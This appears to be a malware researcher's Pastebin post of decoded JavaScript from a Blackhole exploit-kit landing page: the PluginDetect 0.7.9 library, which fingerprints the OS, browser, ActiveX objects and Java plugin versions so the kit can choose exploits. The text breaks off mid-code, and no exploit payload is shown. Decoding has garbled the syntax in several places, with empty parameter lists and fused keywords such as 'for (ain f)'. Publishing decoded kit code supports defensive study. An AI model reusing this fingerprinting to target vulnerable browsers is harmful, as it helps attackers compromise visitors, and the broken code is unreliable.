MalwareMustDie

Apache Blackhole - PD079 Cracked #malwareMustDie 20130120

Jan 19th, 2013
1,761
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // MalwareMustDie - Apache+PHP Blackhole Landing Page
  2. // Decoded PluginDetect 0.7.9
  3.  
  4. var PluginDetect = {
  5.   version : "0.7.9", name : "PluginDetect", handler : function (,, a){
  6.     return function (){
  7.       c(b, a)
  8.     }
  9.   }
  10.   , openTag : "<", isDefined : function (b){
  11.     return typeof b != "undefined"
  12.   }
  13.   , isArray : function (b){
  14.     return (/array/i).test(Object.prototype.toString.call(b))
  15.   }
  16.   , isFunc : function (){
  17.     return typeof b == "function"
  18.   }
  19.   , isString : function (b){
  20.     return typeof b == "string"
  21.   }
  22.   , isNum : function (b){
  23.     return typeof b == "number"
  24.   }
  25.   , isStrNum : function (b){
  26.     return (typeof b == "string" && (/\d/).test(b))
  27.   }
  28.   , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g, getNum :
  29.   function (b, c){
  30.     var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
  31.     exec(b) : null;
  32.     return a ? a[0] : null
  33.   }
  34.   , compareNums : function (,,){
  35.     var e = this , c, b, a, g = parseInt;
  36.     if (e.isStrNum(h) && e.isStrNum(f)){
  37.       if (e.isDefined(d) && d.compareNums){
  38.         return d.compareNums(h, f)
  39.       }
  40.       c = h.split(e.splitNumRegx);
  41.       b = f.split(e.splitNumRegx);
  42.       for (a = 0; a < Math.min(c.length, b.length);
  43.       a ++ ){
  44.         if (g(c[a], 10) > g(b[a], 10)){
  45.           return 1
  46.         }
  47.         if (g(c[a], 10) < g(b[a], 10)){
  48.           return  - 1
  49.         }
  50.       }
  51.     }
  52.     return 0
  53.   }
  54.   , formatNum : function (b, c){
  55.     var d = this , a, e;
  56.     if (!d.isStrNum(b)){
  57.       return null
  58.     }
  59.     if (!d.isNum(c)){
  60.       c = 4
  61.     }
  62.     c--;
  63.     e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
  64.     for (a = 0; a < 4; a ++ ){
  65.       if (/^(0+)(.+)$/.test(e[a])){
  66.         e[a] = RegExp.$2
  67.       }
  68.       if (a > c ||! (/\d/).test(e[a])){
  69.         e[a] = "0"
  70.       }
  71.     }
  72.     return e.slice(0, 4).join(",")
  73.   }
  74.   , $$hasMimeType : function (a){
  75.     return function (c){
  76.       if (!a.isIE && c){
  77.         var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
  78.         for (b = 0; b < d.length; b ++ ){
  79.           if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){
  80.             f = navigator.mimeTypes[d[b]];
  81.             e = f ? f.enabledPlugin : 0;
  82.             if (e && (e.name || e.description)){
  83.               return f
  84.             }
  85.           }
  86.         }
  87.       }
  88.       return null
  89.     }
  90.   }
  91.   , findNavPlugin : function (l, e, c){
  92.     var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ?
  93.     new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
  94.     for (f = 0; f < a.length; f ++ ){
  95.       m = a[f].description || g;
  96.       b = a[f].name || g;
  97.       if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
  98.       test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
  99.         if (!k ||! (k.test(m) || k.test(b))){
  100.           return a[f]
  101.         }
  102.       }
  103.     }
  104.     return null
  105.   }
  106.   , getMimeEnabledPlugin : function (k, m, c){
  107.     var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a, l
  108.     , d, j = e.isString(k) ? [k] : k;
  109.     for (d = 0; d < j.length; d ++ ){
  110.       if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
  111.         l = f.description || h;
  112.         a = f.name || h;
  113.         if (b.test(l) || b.test(a)){
  114.           if (!g ||! (g.test(l) || g.test(a))){
  115.             return f
  116.           }
  117.         }
  118.       }
  119.     }
  120.     return 0
  121.   }
  122.   , getPluginFileVersion : function (f, b){
  123.     var h = this , e, d, g, a, c =- 1;
  124.     if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
  125.       return b
  126.     }
  127.     if (!b){
  128.       return e
  129.     }
  130.     e = h.formatNum(e);
  131.     b = h.formatNum(b);
  132.     d = b.split(h.splitNumRegx);
  133.     g = e.split(h.splitNumRegx);
  134.     for (a = 0; a < d.length; a ++ ){
  135.       if ( - 1 < c && c < a &&! (d[a] == "0")){
  136.         return b
  137.       }
  138.       if (g[a] != d[a]){
  139.         if (c ==- 1){
  140.           c = a
  141.         }
  142.         if (d[a] != "0"){
  143.           return b
  144.         }
  145.       }
  146.     }
  147.     return e
  148.   }
  149.   , AXO : window.ActiveXObject, getAXO : function (a){
  150.     var f = null, d, b = this , c = {
  151.     }
  152.     ;
  153.     try {
  154.       f = new b.AXO(a)
  155.     }
  156.     catch (d){
  157.     }
  158.     return f
  159.   }
  160.   , convertFuncs : function (){
  161.     var a, g, d, b =/^ [ \ $][ \ $] /, c = this ;
  162.     for (ain f){
  163.       if (b.test(a)){
  164.         try {
  165.           g = a.slice(2);
  166.           if (g.length > 0 &&! f[g]){
  167.             f[g] = f[a](f);
  168.             deletef[a]
  169.           }
  170.         }
  171.         catch (d){
  172.         }
  173.       }
  174.     }
  175.   }
  176.   , initObj : function (e, b, d){
  177.     var a, c;
  178.     if (e){
  179.       if (e[b[0]] == 1 || d){
  180.         for (a = 0; a < b.length; a = a + 2){
  181.           e[b[a]] = b[a + 1]
  182.         }
  183.       }
  184.       for (ain e){
  185.         c = e[a];
  186.         if (c && c[b[0]] == 1){
  187.           this .initObj(c, b)
  188.         }
  189.       }
  190.     }
  191.   }
  192.   , initScript : function (){
  193.     var d = this , a = navigator, h, i = document, l = a.userAgent || "", j = a.vendor ||
  194.     "", b = a.platform || "", k = a.product || "";
  195.     d.initObj(d, ["$", d]);
  196.     for (hin d.Plugins){
  197.       if (d.Plugins[h]){
  198.         d.initObj(d.Plugins[h], ["$", d, "$$", d.Plugins[h]], 1)
  199.       }
  200.     }
  201.     d.convertFuncs(d);
  202.     d.OS = 100;
  203.     if (b){
  204.       var g = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2,
  205.       "iPad", 21.3, "Win." + "*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\s*PC", 22.3, "",
  206.       100];
  207.       for (h = g.length - 2; h >= 0; h = h - 2){
  208.         if (g[h] && new RegExp(g[h], "i").test(b)){
  209.           d.OS = g[h + 1];
  210.           break
  211.         }
  212.       }
  213.     }
  214.     ;
  215.     d.head = i.getElementsByTagName("head")[0] || i.getElementsByTagName("body")[0] || i.
  216.     body || null;
  217.     d.isIE = new Function("return/*@cc_on!@*/!1")();
  218.     d.verIE = d.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(l) ? parseFloat(RegExp.$1, 10) : null
  219.     ;
  220.     d.ActiveXEnabled = false;
  221.     if (d.isIE){
  222.       var h, m = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
  223.       "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
  224.       "Scripting.Dictionary", "wmplayer.ocx"];
  225.       for (h = 0; h < m.length; h ++ ){
  226.         if (d.getAXO(m[h])){
  227.           d.ActiveXEnabled = true;
  228.           break
  229.         }
  230.       }
  231.     }
  232.     ;
  233.     d.isGecko = (/Gecko\s*\/\s*\d/i).test(l) && (/Gecko/i).test(k);
  234.     d.verGecko = d.isGecko ? d.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(l) ? RegExp.$1 :
  235.     "0.9") : null;
  236.     d.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(l);
  237.     d.verChrome = d.isChrome ? d.formatNum(RegExp.$1) : null;
  238.     d.isSafari = ((/Apple/i).test(j) || (!j &&! d.isChrome)) && (
  239.     /Safari\s*\/\s*(\d[\d\.]*)/i).test(l);
  240.     d.verSafari = d.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(l) ? d.formatNum(
  241.     RegExp.$1) : null;
  242.     d.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(l);
  243.     d.verOpera = d.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(l) || 1) ? parseFloat(
  244.     RegExp.$1, 10) : null;
  245.     d.addWinEvent("load", d.handler(d.runWLfuncs, d))
  246.   }
  247.   , init : function (d){
  248.     var c = this , b, d, a = {
  249.       status :- 3, plugin : 0
  250.     }
  251.     ;
  252.     if (!c.isString(d)){
  253.       return a
  254.     }
  255.     if (d.length == 1){
  256.       c.getVersionDelimiter = d;
  257.       return a
  258.     }
  259.     d = d.toLowerCase().replace(/\s/g, "");
  260.     b = c.Plugins[d];
  261.     if (!b ||! b.getVersion){
  262.       return a
  263.     }
  264.     a.plugin = b;
  265.     if (!c.isDefined(b.installed)){
  266.       b.installed = null;
  267.       b.version = null;
  268.       b.version0 = null;
  269.       b.getVersionDone = null;
  270.       b.pluginName = d
  271.     }
  272.     c.garbage = false;
  273.     if (c.isIE &&! c.ActiveXEnabled && d !== "Ja" + "va"){
  274.       a.status =- 2;
  275.       return a
  276.     }
  277.     a.status = 1;
  278.     return a
  279.   }
  280.   , fPush : function (b, a){
  281.     var c = this ;
  282.     if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && c.isFunc(b[0]) && 0 < b.length
  283.     ))){
  284.       a.push(b)
  285.     }
  286.   }
  287.   , callArray : function (b){
  288.     var c = this , a;
  289.     if (c.isArray(b)){
  290.       for (a = 0; a < b.length; a ++ ){
  291.         if (b[a] === null){
  292.           return
  293.         }
  294.         c.call(b[a]);
  295.         b[a] = null
  296.       }
  297.     }
  298.   }
  299.   , call : function (c){
  300.     var b = this , a = b.isArray(c) ? c.length :- 1;
  301.     if (0 < a && b.isFunc(c[0])){
  302.       c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
  303.     }
  304.     else {
  305.       if (b.isFunc(c)){
  306.         c(b)
  307.       }
  308.     }
  309.   }
  310.   , $$isMinVersion : function (a){
  311.     return function (h, g, d, c){
  312.       var e = a.init(h), f, b =- 1, j = {
  313.       }
  314.       ;
  315.       if (e.status < 0){
  316.         return e.status
  317.       }
  318.       f = e.plugin;
  319.       g = a.formatNum(a.isNum(g) ? g.toString() : (a.isStrNum(g) ? a.getNum(g) : "0"));
  320.       if (f.getVersionDone != 1){
  321.         f.getVersion(g, d, c);
  322.         if (f.getVersionDone === null){
  323.           f.getVersionDone = 1
  324.         }
  325.       }
  326.       a.cleanup();
  327.       if (f.installed !== null){
  328.         b = f.installed <= 0.5 ? f.installed : (f.installed == 0.7 ? 1 : (f.version ===
  329.         null         ? 0 : (a.compareNums(f.version, g, f) >= 0 ? 1 :- 0.1)))
  330.       }
  331.       ;
  332.       return b
  333.     }
  334.   }
  335.   , getVersionDelimiter : ",", $$getVersion : function (a){
  336.     return function (g, d, c){
  337.       var e = a.init(g), f, b, h = {
  338.       }
  339.       ;
  340.       if (e.status < 0){
  341.         return null
  342.       }
  343.       ;
  344.       f = e.plugin;
  345.       if (f.getVersionDone != 1){
  346.         f.getVersion(null, d, c);
  347.         if (f.getVersionDone === null){
  348.           f.getVersionDone = 1
  349.         }
  350.       }
  351.       a.cleanup();
  352.       b = (f.version || f.version0);
  353.       b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
  354.       return b
  355.     }
  356.   }
  357.   , cleanup : function (){
  358.     var a = this ;
  359.     if (a.garbage && a.isDefined(window.CollectGarbage)){
  360.       window.CollectGarbage()
  361.     }
  362.   }
  363.   , addWinEvent : function (d, c){
  364.     var e = this , a = window, b;
  365.     if (e.isFunc(c)){
  366.       if (a.addEventListener){
  367.         a.addEventListener(d, c, false)
  368.       }
  369.       else {
  370.         if (a.attachEvent){
  371.           a.attachEvent("on" + d, c)
  372.         }
  373.         else {
  374.           b = a["on" + d];
  375.           a["on" + d] = e.winHandler(c, b)
  376.         }
  377.       }
  378.     }
  379.   }
  380.   , winHandler : function (d, c){
  381.     return function (){
  382.       d();
  383.       if (typeof c == "function"){
  384.         c()
  385.       }
  386.     }
  387.   }
  388.   , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
  389.     var b = {
  390.     }
  391.     ;
  392.     a.winLoaded = true;
  393.     a.callArray(a.WLfuncs0);
  394.     a.callArray(a.WLfuncs);
  395.     if (a.onDoneEmptyDiv){
  396.       a.onDoneEmptyDiv()
  397.     }
  398.   }
  399.   , winLoaded : false, $$onWindowLoaded : function (a){
  400.     return function (b){
  401.       if (a.winLoaded){
  402.         a.call(b)
  403.       }
  404.       else {
  405.         a.fPush(b, a.WLfuncs)
  406.       }
  407.     }
  408.   }
  409.   , $$onDetectionDone : function (a){
  410.     return function (h, g, c, b){
  411.       var d = a.init(h), k, e, j = {
  412.       }
  413.       ;
  414.       if (d.status ==- 3){
  415.         return  - 1
  416.       }
  417.       e = d.plugin;
  418.       if (!a.isArray(e.funcs)){
  419.         e.funcs = []
  420.       }
  421.       if (e.getVersionDone != 1){
  422.         k = a.isMinVersion ? a.isMinVersion(h, "0", c, b) : a.getVersion(h, c, b)
  423.       }
  424.       if (e.installed !=- 0.5 && e.installed != 0.5){
  425.         a.call(g);
  426.         return 1
  427.       }
  428.       if (e.NOTF){
  429.         a.fPush(g, e.funcs);
  430.         return 0
  431.       }
  432.       return 1
  433.     }
  434.   }
  435.   , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv : function
  436.   (){
  437.     var d = this , b, h, c, a, f, g;
  438.     if (d.div && d.div.childNodes){
  439.       for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
  440.         c = d.div.childNodes[b];
  441.         if (c && c.childNodes){
  442.           for (h = c.childNodes.length - 1; h >= 0; h -- ){
  443.             g = c.childNodes[h];
  444.             try {
  445.               c.removeChild(g)
  446.             }
  447.             catch (f){
  448.             }
  449.           }
  450.         }
  451.         if (c){
  452.           try {
  453.             d.div.removeChild(c)
  454.           }
  455.           catch (f){
  456.           }
  457.         }
  458.       }
  459.     }
  460.     if (!d.div){
  461.       a = document.getElementById(d.divID);
  462.       if (a){
  463.         d.div = a
  464.       }
  465.     }
  466.     if (d.div && d.div.parentNode){
  467.       try {
  468.         d.div.parentNode.removeChild(d.div)
  469.       }
  470.       catch (f){
  471.       }
  472.       d.div = null
  473.     }
  474.   }
  475.   , DONEfuncs : [], onDoneEmptyDiv : function (){
  476.     var c = this , a, b;
  477.     if (!c.winLoaded){
  478.       return
  479.     }
  480.     if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
  481.       return
  482.     }
  483.     for (ain c){
  484.       b = c[a];
  485.       if (b && b.funcs){
  486.         if (b.OTF == 3){
  487.           return
  488.         }
  489.         if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
  490.           return
  491.         }
  492.       }
  493.     }
  494.     for (a = 0; a < c.DONEfuncs.length; a ++ ){
  495.       c.callArray(c.DONEfuncs)
  496.     }
  497.     c.emptyDiv()
  498.   }
  499.   , getWidth : function (c){
  500.     if (c){
  501.       var a = c.scrollWidth || c.offsetWidth, b = this ;
  502.       if (b.isNum(a)){
  503.         return a
  504.       }
  505.     }
  506.     return  - 1
  507.   }
  508.   , getTagStatus : function (m, g, a, b){
  509.     var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d = g.
  510.     span, i = c.getWidth(d);
  511.     if (!k ||! h ||! d ||! c.getDOMobj(m)){
  512.       return  - 2
  513.     }
  514.     if (j < i || 0 > l || 0 > j || 0 > i || i <= c.pluginSize || c.pluginSize < 1){
  515.       return 0
  516.     }
  517.     if (l >= i){
  518.       return  - 1
  519.     }
  520.     try {
  521.       if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
  522.         if (!m.winLoaded && c.winLoaded){
  523.           return 1
  524.         }
  525.         if (m.winLoaded && c.isNum(b)){
  526.           if (!c.isNum(m.count)){
  527.             m.count = b
  528.           }
  529.           if (b - m.count >= 10){
  530.             return 1
  531.           }
  532.         }
  533.       }
  534.     }
  535.     catch (f){
  536.     }
  537.     return 0
  538.   }
  539.   , getDOMobj : function (g, a){
  540.     var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
  541.     try {
  542.       if (b && a){
  543.         d.div.focus()
  544.       }
  545.     }
  546.     catch (f){
  547.     }
  548.     return b ? c.firstChild : null
  549.   }
  550.   , setStyle : function (b, g){
  551.     var f = b.style, a, d, c = this ;
  552.     if (f && g){
  553.       for (a = 0; a < g.length; a = a + 2){
  554.         try {
  555.           f[g[a]] = g[a + 1]
  556.         }
  557.         catch (d){
  558.         }
  559.       }
  560.     }
  561.   }
  562.   , insertDivInBody : function (i, g){
  563.     var f, c = this , h = "pd33993399", b = null, d = g ? window.top.document : window.
  564.     document, a = d.getElementsByTagName("body")[0] || d.body;
  565.     if (!a){
  566.       try {
  567.         d.write('<div id="' + h + '">.' + c.openTag + "/div>");
  568.         b = d.getElementById(h)
  569.       }
  570.       catch (f){
  571.       }
  572.     }
  573.     a = d.getElementsByTagName("body")[0] || d.body;
  574.     if (a){
  575.       a.insertBefore(i, a.firstChild);
  576.       if (b){
  577.         a.removeChild(b)
  578.       }
  579.     }
  580.   }
  581.   , insertHTML : function (f, b, g, a, k){
  582.     var l, m = document, j = this , p, o = m.createElement("span"), n, i;
  583.     var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
  584.     "0px", "visibility", "visible"];
  585.     var h =
  586.     "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
  587.     if (!j.isDefined(a)){
  588.       a = ""
  589.     }
  590.     if (j.isString(f) && (/[^\s]/).test(f)){
  591.       f = f.toLowerCase().replace(/\s/g, "");
  592.       p = j.openTag + f + ' width="' + j.pluginSize + '" height="' + j.pluginSize + '" ';
  593.       p += 'style="' + h + 'display:inline;" ';
  594.       for (n = 0; n < b.length; n = n + 2){
  595.         if (/[^\s]/.test(b[n + 1])){
  596.           p += b[n] + '="' + b[n + 1] + '" '
  597.         }
  598.       }
  599.       p += ">";
  600.       for (n = 0; n < g.length; n = n + 2){
  601.         if (/[^\s]/.test(g[n + 1])){
  602.           p += j.openTag + 'param name="' + g[n] + '" value="' + g[n + 1] + '" />'
  603.         }
  604.       }
  605.       p += a + j.openTag + "/" + f + ">"
  606.     }
  607.     else {
  608.       p = a
  609.     }
  610.     if (!j.div){
  611.       i = m.getElementById(j.divID);
  612.       if (i){
  613.         j.div = i
  614.       }
  615.       else {
  616.         j.div = m.createElement("div");
  617.         j.div.id = j.divID
  618.       }
  619.       j.setStyle(j.div, c.concat(["width", j.divWidth + "px", "height", (j.pluginSize + 3)
  620.        + "px", "fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) +
  621.       "px", "verticalAlign", "baseline", "display", "block"]));
  622.       if (!i){
  623.         j.setStyle(j.div, ["position", "absolute", "right", "0px", "top", "0px"]);
  624.         j.insertDivInBody(j.div)
  625.       }
  626.     }
  627.     if (j.div && j.div.parentNode){
  628.       j.setStyle(o, c.concat(["fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.
  629.       pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
  630.       try {
  631.         o.innerHTML = p
  632.       }
  633.       catch (l){
  634.       }
  635.       ;
  636.       try {
  637.         j.div.appendChild(o)
  638.       }
  639.       catch (l){
  640.       }
  641.       ;
  642.       return {
  643.         span : o, winLoaded : j.winLoaded, tagName : f, outerHTML : p
  644.       }
  645.     }
  646.     return {
  647.       span : null, winLoaded : j.winLoaded, tagName : "", outerHTML : p
  648.     }
  649.   }
  650.   , file : {
  651.     $ : 1, any : "fileStorageAny999", valid : "fileStorageValid999", save : function (d, f
  652.     , c){
  653.       var b = this , e = b.$, a;
  654.       if (d && e.isDefined(c)){
  655.         if (!d[b.any]){
  656.           d[b.any] = []
  657.         }
  658.         if (!d[b.valid]){
  659.           d[b.valid] = []
  660.         }
  661.         d[b.any].push(c);
  662.         a = b.split(f, c);
  663.         if (a){
  664.           d[b.valid].push(a)
  665.         }
  666.       }
  667.     }
  668.     , getValidLength : function (a){
  669.       return a && a[this .valid] ? a[this .valid].length : 0
  670.     }
  671.     , getAnyLength : function (a){
  672.       return a && a[this .any] ? a[this .any].length : 0
  673.     }
  674.     , getValid : function (c, a){
  675.       var b = this ;
  676.       return c && c[b.valid] ? b.get(c[b.valid], a) : null
  677.     }
  678.     , getAny : function (c, a){
  679.       var b = this ;
  680.       return c && c[b.any] ? b.get(c[b.any], a) : null
  681.     }
  682.     , get : function (d, a){
  683.       var c = d.length - 1, b = this .$.isNum(a) ? a : c;
  684.       return (0 > b || b > c) ? null : d[b]
  685.     }
  686.     , split : function (g, c){
  687.       var b = this , e = b.$, f = null, a, d;
  688.       g = g ? g.replace(".", "\.") : "";
  689.       d = new RegExp("^(.*[^\/])(" + g + "\s*)$");
  690.       if (e.isString(c) && d.test(c)){
  691.         a = (RegExp.$1).split("/");
  692.         f = {
  693.           name : a[a.length - 1], ext : RegExp.$2, full : c
  694.         }
  695.         ;
  696.         a[a.length - 1] = "";
  697.         f.path = a.join("/")
  698.       }
  699.       return f
  700.     }
  701.     , z : 0
  702.   }
  703.   , Plugins : {
  704.     java : {
  705.       mimeType : ["application/x-java-applet", "application/x-java-vm",
  706.       "application/x-java-bean"], classID : "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
  707.       navigator : {
  708.         a : window.navigator.javaEnabled(), javaEnabled : function (){
  709.           return this .a
  710.         }
  711.         , mimeObj : 0, pluginObj : 0
  712.       }
  713.       , OTF : null, minIEver : 7, debug : 0, debugEnable : function (){
  714.         var a = this , b = a.$;
  715.         a.debug = 1
  716.       }
  717.       , isDisabled : {
  718.         $ : 1, DTK : function (){
  719.           var a = this , c = a.$, b = a.$$;
  720.           if ((c.isGecko && c.compareNums(c.verGecko, c.formatNum("1.6")) <= 0) || (c.
  721.           isSafari && c.OS == 1 && (!c.verSafari || 0 > c.compareNums(c.verSafari,
  722.           "5,1,0,0"))) || c.isChrome || (c.isIE &&! c.ActiveXEnabled)){
  723.             return 1
  724.           }
  725.           return 0
  726.         }
  727.         , AXO : function (){
  728.           var a = this , c = a.$, b = a.$$;
  729.           return (!c.isIE ||! c.ActiveXEnabled || (!b.debug && b.DTK.query().status !== 0
  730.           ))
  731.         }
  732.         , navMime : function (){
  733.           var b = this , d = b.$, c = b.$$, a = c.navigator;
  734.           if (d.isIE ||! a.mimeObj ||! a.pluginObj){
  735.             return 1
  736.           }
  737.           return 0
  738.         }
  739.         , navPlugin : function (){
  740.           var b = this , d = b.$, c = b.$$, a = c.navigator;
  741.           if (d.isIE ||! a.mimeObj ||! a.pluginObj){
  742.             return 1
  743.           }
  744.           return 0
  745.         }
  746.         , windowDotJava : function (){
  747.           var a = this , c = a.$, b = a.$$;
  748.           if (!window.java){
  749.             return 1
  750.           }
  751.           if (c.OS == 2 && c.verOpera > 8 && c.verOpera && c.verOpera < (9.3 - 0.1)){
  752.             return 1
  753.           }
  754.           return 0
  755.         }
  756.         , allApplets : function (){
  757.           var b = this , d = b.$, c = b.$$, a = c.navigator;
  758.           if (d.OS >= 20){
  759.             return 0
  760.           }
  761.           if (d.verOpera && d.verOpera < 11 &&! a.javaEnabled() &&! c.lang.System.
  762.           getProperty()[0]){
  763.             return 1
  764.           }
  765.           if ((d.verGecko && 0 > d.compareNums(d.verGecko, d.formatNum("2"))) &&! a.
  766.           mimeObj &&! c.lang.System.getProperty()[0]){
  767.             return 1
  768.           }
  769.           return 0
  770.         }
  771.         , AppletTag : function (){
  772.           var b = this , d = b.$, c = b.$$, a = c.navigator;
  773.           return d.isIE ?! a.javaEnabled() : 0
  774.         }
  775.         , ObjectTag : function (){
  776.           var a = this , c = a.$, b = a.$$;
  777.           return c.isIE ?! c.ActiveXEnabled : 0
  778.         }
  779.         , z : 0
  780.       }
  781.       , getVerifyTagsDefault : function (){
  782.         var a = this , c = a.$, b = [1, 0, 1];
  783.         if (c.OS >= 20){
  784.           return b
  785.         }
  786.         if ((c.isIE && (c.verIE < 9 ||! c.ActiveXEnabled)) || (c.verGecko && 0 > c.
  787.         compareNums(c.verGecko, c.formatNum("2"))) || (c.isSafari && (!c.verSafari || 0 >
  788.         c.compareNums(c.verSafari, c.formatNum("4")))) || (c.verOpera && c.verOpera < 10
  789.         )){
  790.           b = [1, 1, 1]
  791.         }
  792.         return b
  793.       }
  794.       , getVersion : function (j, g, i){
  795.         var b = this , d = b.$, e, a = b.applet, h = b.verify, k = b.navigator, f = null,
  796.         l = null, c = null;
  797.         if (b.getVersionDone === null){
  798.           b.OTF = 0;
  799.           k.mimeObj = d.hasMimeType(b.mimeType);
  800.           if (k.mimeObj){
  801.             k.pluginObj = k.mimeObj.enabledPlugin
  802.           }
  803.           if (h){
  804.             h.begin()
  805.           }
  806.         }
  807.         a.setVerifyTagsArray(i);
  808.         d.file.save(b, ".jar", g);
  809.         if (b.getVersionDone === 0){
  810.           if (a.should_Insert_Query_Any()){
  811.             e = a.insert_Query_Any();
  812.             b.setPluginStatus(e[0], e[1], f)
  813.           }
  814.           return
  815.         }
  816.         if ((!f || b.debug) && b.DTK.query().version){
  817.           f = b.DTK.version
  818.         }
  819.         if ((!f || b.debug) && b.navMime.query().version){
  820.           f = b.navMime.version
  821.         }
  822.         if ((!f || b.debug) && b.navPlugin.query().version){
  823.           f = b.navPlugin.version
  824.         }
  825.         if ((!f || b.debug) && b.AXO.query().version){
  826.           f = b.AXO.version
  827.         }
  828.         if (b.nonAppletDetectionOk(f)){
  829.           c = f
  830.         }
  831.         if (!c || b.debug || a.VerifyTagsHas(2.2) || a.VerifyTagsHas(2.5)){
  832.           e = b.lang.System.getProperty();
  833.           if (e[0]){
  834.             f = e[0];
  835.             c = e[0];
  836.             l = e[1]
  837.           }
  838.         }
  839.         b.setPluginStatus(c, l, f);
  840.         if (a.should_Insert_Query_Any()){
  841.           e = a.insert_Query_Any();
  842.           if (e[0]){
  843.             c = e[0];
  844.             l = e[1]
  845.           }
  846.         }
  847.         b.setPluginStatus(c, l, f)
  848.       }
  849.       , nonAppletDetectionOk : function (b){
  850.         var d = this , e = d.$, a = d.navigator, c = 1;
  851.         if (!b || (!a.javaEnabled() &&! d.lang.System.getPropertyHas(b)) || (!e.isIE &&! a
  852.         .mimeObj &&! d.lang.System.getPropertyHas(b)) || (e.isIE &&! e.ActiveXEnabled)){
  853.           c = 0
  854.         }
  855.         else {
  856.           if (e.OS >= 20){
  857.           }
  858.           else {
  859.             if (d.info && 0 > d.info.getPlugin2Status() && d.info.BrowserRequiresPlugin2
  860.             ()){
  861.               c = 0
  862.             }
  863.           }
  864.         }
  865.         return c
  866.       }
  867.       , setPluginStatus : function (d, f, a){
  868.         var c = this , e = c.$, b;
  869.         a = a || c.version0;
  870.         if (0 < c.OTF){
  871.           d = d || c.lang.System.getProperty()[0]
  872.         }
  873.         if (c.OTF < 3){
  874.           b = d ? 1 : (a ?- 0.2 :- 1);
  875.           if (c.installed === null || b > c.installed){
  876.             c.installed = b
  877.           }
  878.         }
  879.         if (c.OTF == 2 && c.NOTF &&! c.applet.getResult()[0] &&! c.lang.System.getProperty
  880.         ()[0]){
  881.           c.installed = a ?- 0.2 :- 1
  882.         }
  883.         ;
  884.         if (c.OTF == 3 && c.installed !=- 0.5 && c.installed != 0.5){
  885.           c.installed = (c.NOTF.isJavaActive(1) == 1 || c.lang.System.getProperty()[0]) ?
  886.           0.5 :- 0.5
  887.         }
  888.         if (c.OTF == 4 && (c.installed ==- 0.5 || c.installed == 0.5)){
  889.           if (d){
  890.             c.installed = 1
  891.           }
  892.           else {
  893.             if (c.NOTF.isJavaActive(1) == 1){
  894.               if (a){
  895.                 c.installed = 1;
  896.                 d = a
  897.               }
  898.               else {
  899.                 c.installed = 0
  900.               }
  901.             }
  902.             else {
  903.               if (a){
  904.                 c.installed =- 0.2
  905.               }
  906.               else {
  907.                 c.installed =- 1
  908.               }
  909.             }
  910.           }
  911.         }
  912.         ;
  913.         if (a){
  914.           c.version0 = e.formatNum(e.getNum(a))
  915.         }
  916.         if (d){
  917.           c.version = e.formatNum(e.getNum(d))
  918.         }
  919.         if (f && e.isString(f)){
  920.           c.vendor = f
  921.         }
  922.         if (!c.vendor){
  923.           c.vendor = ""
  924.         }
  925.         if (c.verify && c.verify.isEnabled()){
  926.           c.getVersionDone = 0
  927.         }
  928.         else {
  929.           if (c.getVersionDone != 1){
  930.             if (c.OTF < 2){
  931.               c.getVersionDone = 0
  932.             }
  933.             else {
  934.               c.getVersionDone = c.applet.can_Insert_Query_Any() ? 0 : 1
  935.             }
  936.           }
  937.         }
  938.       }
  939.       , DTK : {
  940.         $ : 1, hasRun : 0, status : null, VERSIONS : [], version : "", HTML : null,
  941.         Plugin2Status : null, classID : ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA",
  942.         "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"], mimeType : [
  943.         "application/java-deployment-toolkit",
  944.         "application/npruntime-scriptable-plugin;DeploymentToolkit"], disabled : function
  945.         (){
  946.           return this .$$.isDisabled.DTK()
  947.         }
  948.         , query : function (){
